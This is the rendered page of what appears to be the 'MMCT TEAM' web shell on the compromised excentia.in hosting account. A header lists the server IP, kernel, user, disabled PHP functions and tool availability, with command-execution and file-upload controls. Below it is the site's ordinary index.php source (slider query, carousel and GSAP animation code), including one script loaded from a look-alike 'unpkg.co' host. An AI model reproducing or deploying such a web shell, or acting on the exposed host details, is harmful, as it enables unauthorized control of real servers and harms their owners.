MMCT TEAM
Server IP : 145.79.210.100  /  Your IP : 216.73.216.101
Web Server : LiteSpeed
System : Linux in-mum-web1954.main-hosting.eu 5.14.0-570.26.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 16 09:12:04 EDT 2025 x86_64
User : u474798400 ( 474798400)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u474798400/domains/excentia.in/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u474798400/domains/excentia.in/public_html/index.php
<?php include('admin/config.php'); ?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-----fav-icon css link-->
    <link rel="icon" type="images/x-icon" href="./images/excentia-logo.png">
    <!-----custom css-->
    <link rel="stylesheet" href="./sass/style.css">
    <!-----font awesome CDN link-->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <!----owl carousel css link-->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.1.3/assets/owl.carousel.min.css">
    <!-- <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet"> -->
    <title>Excentia</title>
    <style>
        .owl-carousel .owl-item.active .img .banner-text .text{
            /* color: red; */
            margin-top: -100%;
            animation: fadeDown 1s linear;
            opacity: 0;
            animation-fill-mode: forwards;
            animation-delay: 1s;
        }
        @keyframes fadeDown {
            0%{
                margin-top: -100%;
                opacity: 0;
            }
            100%{
                margin-top:0%;
                opacity: 1;
            }
        }
         .owl-carousel .owl-item.active .img .banner-text .right_part {
            width: 5%;
            position: absolute;
            right: -95%;
            opacity: 0; 
            animation: logo_right_part 1s ease;
            animation-delay: 1s;
            animation-fill-mode: forwards;
        }
        @keyframes logo_right_part {
            0%{
                position: absolute;
                right: -95%;  
                opacity: 0;
            }
            100%{
                position: absolute;
                right: -12%;
                opacity: 1;
            }
        }

        .owl-carousel .owl-item.active .img .banner-text .left_part {
            width: 5%;
            position: absolute;
            left: -95%;
            opacity: 0;
            animation: logo_left_part 1s ease;
            animation-delay: 1s;
            animation-fill-mode: forwards;
        }
        @keyframes logo_left_part {
            0%{
                position: absolute;
                left: -95%;  
                opacity: 0;
            }
            100%{
                position: absolute;
                left: -12%;
                opacity: 1;
            }
        }
            
        
    </style>
</head>
<body>
     <div class="main">
        <!-------START OF TOP MENU-->
        <div class="nav_wrap" data-aos="fade-down" data-aos-duration="3000">
            <div class="logo">
                <a href="index.php">
                    <img src="./images/logo.png" alt="">
                </a>
            </div>
            <div class="menuWithIcons">
                <!--<ul>-->
                <!--    <li>-->
                <!--        <div class="box"></div>-->
                <!--        <a href="#">Overview</a>-->
                <!--    </li>-->

                <!--    <li>-->
                <!--        <div class="box"></div>-->
                <!--        <a href="#">Services</a>-->
                <!--    </li>-->

                <!--    <li>-->
                <!--        <div class="box"></div>-->
                <!--        <a href="#">Client</a>-->
                <!--    </li>-->

                <!--    <li>-->
                <!--        <div class="box"></div>-->
                <!--        <a href="#">Recognition</a>-->
                <!--    </li>-->

                <!--    <li>-->
                <!--        <div class="box"></div>-->
                <!--        <a href="#">Career</a>-->
                <!--    </li>-->
                <!--</ul>-->
                <div class="menu_icon">
                    <span class="one"></span>
                    <span class="two"></span>
                    <span class="three"></span>
                </div>
            </div>
            
         </div>
        <!-------END OF TOP MENU------>
            <!------COPY------>
        
            <div class="mid-logo-container">
                <div class="first_part">
                    <img src="./images/1.png" alt="">
                    <div class="line1"></div>
                </div>
                <div class="second_part">
                    <img src="./images/2.png" alt="">
                    <div class="line2"></div>
                </div>
                <div class="third_part">
                    <img src="./images/3.png" alt="">
                    <div class="line3"></div>
                </div>
                <div class="fourth_part">
                    <img src="./images/4.png" alt="">
                    <div class="line4"></div>
                </div>
                <div class="fifth_part">
                    <img src="./images/5.png" alt="">
                    <div class="line5"></div>
                </div>
                <div class="top-window"></div>
                <div class="bottom-window"></div>
                <div class="left-window"></div>
                <div class="right-window"></div>
            </div>

        <!------COPY------>
        
        
            <div class="menu-items-container">
                <ul>
                    <li><a href="index.php" class="menu-1">Home</a></li>
            <li><a href="about_us.php" class="menu-2">About Us</a></li>
            <li><a href="projects.php" class="menu-3">Projects</a></li>
            <!--<li><a href="media.php" class="menu-4">Media</a></li>-->
            <li><a href="work_with_us.php" class="menu-4">Work With Us</a></li>
            <li><a href="contact.php" class="menu-5">Contact Us</a></li>
                </ul>
            </div>
    </div> 

      <!-----banner-container-->
      <div class="banner-img">
        <!-- <img src="./images/banner-img.jpg" alt=""/> -->
        <div class="all-images owl-carousel">
            
            <?php
             $sql=mysqli_query($conn,"SELECT * FROM tbl_slider order by id asc");
             while ($row=mysqli_fetch_array($sql)){
                 if(is_numeric( $row['title'] )){
                 $class='numeric';
                 $class1='n-design';
                    }else{
                        $class='non-numeric';
                        $class1='o-design';
                    }
            ?>
            <div class="img" class="item" data-aos="zoom-in">
                <img src="admin/upload_image/<?php echo $row['desk_img']?>" id="desk-banner" alt=""/> 
                <img src="admin/upload_image/<?php echo $row['mob_img']?>" id="mob-banner" alt="">
                <!----banner middle text content with logo part-->
                 <div class="banner-text">
                    <div class="left_part">
                        <img src="./images/logo_left_part.png" alt="">
                    </div>
                    <div class="banner-text-2">
                    <div class="text <?=$class;?>"><?php echo $row['title']?></div>
                    <div class="next-text <?=$class1;?>"><?php echo $row['title1']?></div>
                    </div>
                    <div class="right_part">
                        <img src="./images/logo_right_part.png" alt="">
                    </div>
                 </div>
                 <!--------END---------->
                 <!--<div class="left-arrow-text"><?php echo $row['left_arrow_text']?></div>-->
                 <!--<div class="right-arrow-text"><?php echo $row['right_arrow_text']?></div>-->
                 
            </div>
    
            <?php 
                    }
                
            ?>

            <!--<div class="img" class="item" data-aos="zoom-in">-->
            <!--    <img src="./images/banner-2.jpg" id="desk-banner" alt=""> -->
            <!--    <img src="./images/mob-banner-2.jpg" id="mob-banner"alt="">-->
                <!----banner middle text content with logo part-->
            <!--    <div class="banner-text">-->
            <!--        <div class="left_part">-->
            <!--            <img src="./images/logo_left_part.png" alt="">-->
            <!--        </div>-->
            <!--        <div class="text">Innovation</div>-->
            <!--        <div class="right_part">-->
            <!--            <img src="./images/logo_right_part.png" alt="">-->
            <!--        </div>-->
            <!--    </div>-->
                <!------------END---------->
            <!--    <div class="left-arrow-text">Experience</div>-->
            <!--    <div class="right-arrow-text">Excellence</div>-->
            <!--</div>-->
    
            <!--<div class="img" class="item" data-aos="zoom-in">-->
            <!--    <img src="./images/banner-3.jpg" id="desk-banner" alt="" > -->
            <!--    <img src="./images/mob-banner-3.jpg" id="mob-banner" alt="">-->
                <!----banner middle text content with logo part-->
            <!--    <div class="banner-text">-->
            <!--        <div class="left_part">-->
            <!--            <img src="./images/logo_left_part.png" alt="">-->
            <!--        </div>-->
            <!--        <div class="text">Excellence</div>-->
            <!--        <div class="right_part">-->
            <!--            <img src="./images/logo_right_part.png" alt="">-->
            <!--        </div>-->
            <!--    </div>-->
                <!-------END-------->

            <!--    <div class="left-arrow-text">Innovation</div>-->
            <!--    <div class="right-arrow-text">Integrity</div>-->
            <!--</div>-->
            
            <!--<div class="img" class="item" data-aos="zoom-in"> -->
            <!--    <img src="./images/banner-4.jpg" id="desk-banner" alt=""/> -->
            <!--    <img src="./images/mob-banner-4.jpg" id="mob-banner" alt="">-->
                <!----banner middle text content with logo part-->
            <!--    <div class="banner-text">-->
            <!--        <div class="left_part">-->
            <!--            <img src="./images/logo_left_part.png" alt="">-->
            <!--        </div>-->
            <!--        <div class="text">Integrity</div>-->
            <!--        <div class="right_part">-->
            <!--            <img src="./images/logo_right_part.png" alt="">-->
            <!--        </div>-->
            <!--    </div>-->
                <!------END--------->

            <!--    <div class="left-arrow-text">Excellence</div>-->
            <!--    <div class="right-arrow-text">Experience</div>-->
            <!--</div>-->
       </div>
    </div>

<!-----------START of Onscroll animation using GSAP----------->

<!-----------START of Onscroll animation using GSAP----------->
<!-- <section class="onscroll-logo">
    <div class="logo-container">
       <div class="first-part">
           <img src="./images/1.png" alt="">
       </div>
       <div class="second-part">
           <img src="./images/2.png" alt="">
       </div>
       <div class="third-part">
           <img src="./images/3.png" alt="">
       </div>
       <div class="fourth-part">
           <img src="./images/4.png" alt="">
       </div>
       <div class="fifth-part">
           <img src="./images/5.png" alt="">
       </div>
   </div>
</section> -->

    
  <!-- <section class="onscroll-logo">
    <div class="logo-container">
       <div class="firstpart">
           <img src="./images/1.png" alt="">
       </div>
       <div class="secondpart">
           <img src="./images/2.png" alt="">
       </div>
       <div class="thirdpart">
           <img src="./images/3.png" alt="">
       </div>
       <div class="fourthpart">
           <img src="./images/4.png" alt="">
       </div>
       <div class="fifthpart">
           <img src="./images/5.png" alt="">
       </div>
   </div>
</section> -->



   
<!-- <script>
    var middle_logo=document.querySelector(".mid-logo-container");
    window.onload=function(){
       middle_logo.style.display="none";
    }
    setTimeout(()=>{
        middle_logo.style.display="flex";
    },500);
</script> -->


<!------- javascript for open/close menu-->

<!-- <script type="text/javascript">
  var main__menu=document.querySelector(".menu-items-container ul");
  var nav_menu=document.querySelector(".nav-wrap ul");
  var one=document.querySelector("#one");
  var two=document.querySelector("#two");
  var three=document.querySelector("#three");
  var flag=true;
  document.querySelector(".menu_icon").addEventListener("click",()=>{
    if(flag){
      main__menu.style.width="85%";
      main__menu.style.height="100%";
      nav_menu.style.opacity='0';
      three.style.display="none";
      one.style.width='100%'
      one.style.transform='rotate(42deg)';
      two.style.transform='rotate(304deg) translate(8px, -2px)';
      flag=false;
    }else{
      main__menu.style.width="0";
      main__menu.style.height="0";
      nav_menu.style.opacity='1';
      three.style.display="block";
      one.style.width='50%'
      one.style.transform='rotate(0)';
      two.style.transform='rotate(0deg) translate(0px, 0px)';
      flag=true;  
    }
  })
</script> -->

<!--------End of Open/Close menu-->

<script src="https://unpkg.co/gsap@3/dist/gsap.min.js"></script>
<script src="https://unpkg.com/gsap@3/dist/ScrollTrigger.min.js"></script>
<script>
    gsap.registerPlugin(ScrollTrigger); 

    gsap.fromTo(
        '.first-part',
        { //xPercent: -550 
            xPercent: -350
        }, // It Starts on the rights
        {
            xPercent: 1000, // It Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                //pin: 'header',
                //trigger: '.fourth_part',
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        }
    )

    gsap.fromTo(
        '.second-part',
        { xPercent:-350 }, //It Starts on the rights
        {
            // xPercent: 1110, //It Moves to the left
            xPercent: 1010,
            ease: 'power1.inOut',
            scrollTrigger: {
                //pin: 'header',
                //trigger: '.fourth_part',
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )




    gsap.fromTo(
        '.fourth-part',
        { xPercent: 350 }, //Starts on the rights
        {
           // xPercent: -890, // Moves to the left
           xPercent:-1030,
            ease: 'power1.inOut',
            scrollTrigger: {
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )

    gsap.fromTo(
        '.fifth-part',
        {// xPercent:550 
            xPercent:350 
        }, // it Starts on the rights...
        {
            xPercent: -1100, // it Moves to the left...
            ease: 'power1.inOut',
            scrollTrigger: {
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )
 
</script>

<script>
    gsap.registerPlugin(ScrollTrigger); 

    gsap.fromTo(
        '.firstpart',
        { xPercent: -550 }, // It Starts on the rights
        {
            xPercent: 200, // It Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                //pin: 'header',
                //trigger: '.fourth_part',
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        }
    )

    gsap.fromTo(
        '.secondpart',
        { xPercent:-450 }, //It Starts on the rights
        {
            xPercent: 120, //It Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                //pin: 'header',
                //trigger: '.fourth_part',
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )




    gsap.fromTo(
        '.fourthpart',
        { xPercent: 350 }, //Starts on the rights
        {
            xPercent: -100, // Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )

    gsap.fromTo(
        '.fifthpart',
        { xPercent:550 }, // it Starts on the rights...
        {
            xPercent: -250, // it Moves to the left...
            ease: 'power1.inOut',
            scrollTrigger: {
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )
 
</script>
<!-- <script>
    gsap.registerPlugin(ScrollTrigger); 

    gsap.fromTo(
        '.first-part',
        { xPercent: -630 }, // It Starts on the rights
        {
            xPercent: 10, // It Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                //pin: 'header',
                //trigger: '.fourth_part',
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        }
    )

    gsap.fromTo(
        '.second-part',
        { xPercent:-530 }, //It Starts on the rights
        {
            xPercent: 10, //It Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                //pin: 'header',
                //trigger: '.fourth_part',
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )




    gsap.fromTo(
        '.fourth-part',
        { xPercent: 430 }, //Starts on the rights
        {
            xPercent: -10, // Moves to the left
            ease: 'power1.inOut',
            scrollTrigger: {
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )

    gsap.fromTo(
        '.fifth-part',
        { xPercent:630 }, // it Starts on the rights...
        {
            xPercent: -10, // it Moves to the left...
            ease: 'power1.inOut',
            scrollTrigger: {
                start: 'top center',
                end: 'bottom top',
                scrub: true,
            },
        } 
    )
 
</script> -->


<!------When top animation will done then another section will be autometically loaded by JS-->
    <!-- <script>
       setTimeout(()=>{
       // document.querySelector(".sec").style.transform='scale(1)'
       document.querySelector(".sec").style.display='block';
       },6000);
    </script> -->
<!---------------END------------------> 

<script>
   
</script>

<script src="./js/commonMenu.js"></script>

<!-- <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script> -->

<!----owl carousel script link-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.1.3/owl.carousel.min.js"></script>

<script>
  setTimeout(()=>{
    $('.owl-carousel').owlCarousel({
    loop: true,
    nav: true,
    smartSpeed: 2500,
    loop:true,
    navText: [
     "<span>&#10229;</span>",
     "<span>&#10230;</span>"
    ],
    autoplay: true,
    responsive: {
      0: {
        items: 1
      },
      600: {
        items: 1
      },
      1000: {
        items: 1
      }
    }
  });
},3800);

</script>

  <!-- <script>
  var middle_container=document.querySelector(".mid-logo-container");
  setTimeout(()=>{
    middle_container.style.justifyContent="space-between";
    middle_container.style.left="54%";
    document.querySelector(".first_part").style.position='static';
    document.querySelector(".first_part").style.visibility='visible';
    document.querySelector(".first_part").style.animation="none";

    document.querySelector(".second_part").style.position='static';
    document.querySelector(".second_part").style.visibility='visible';
    document.querySelector(".second_part").style.animation="none";

    //document.querySelector(".second_part").style.position='static';
    document.querySelector(".fourth_part").style.position='static';
    document.querySelector(".fourth_part").style.visibility='visible';
    document.querySelector(".fourth_part").style.animation="none";

    document.querySelector(".fifth_part").style.position='static';
    document.querySelector(".fifth_part").style.visibility='visible';
    document.querySelector(".fifth_part").style.animation="none";
  },4200);
</script> -->

<script>
    AOS.init({
        duration:1500
    });
</script>


</body>
</html>

MMCT - 2023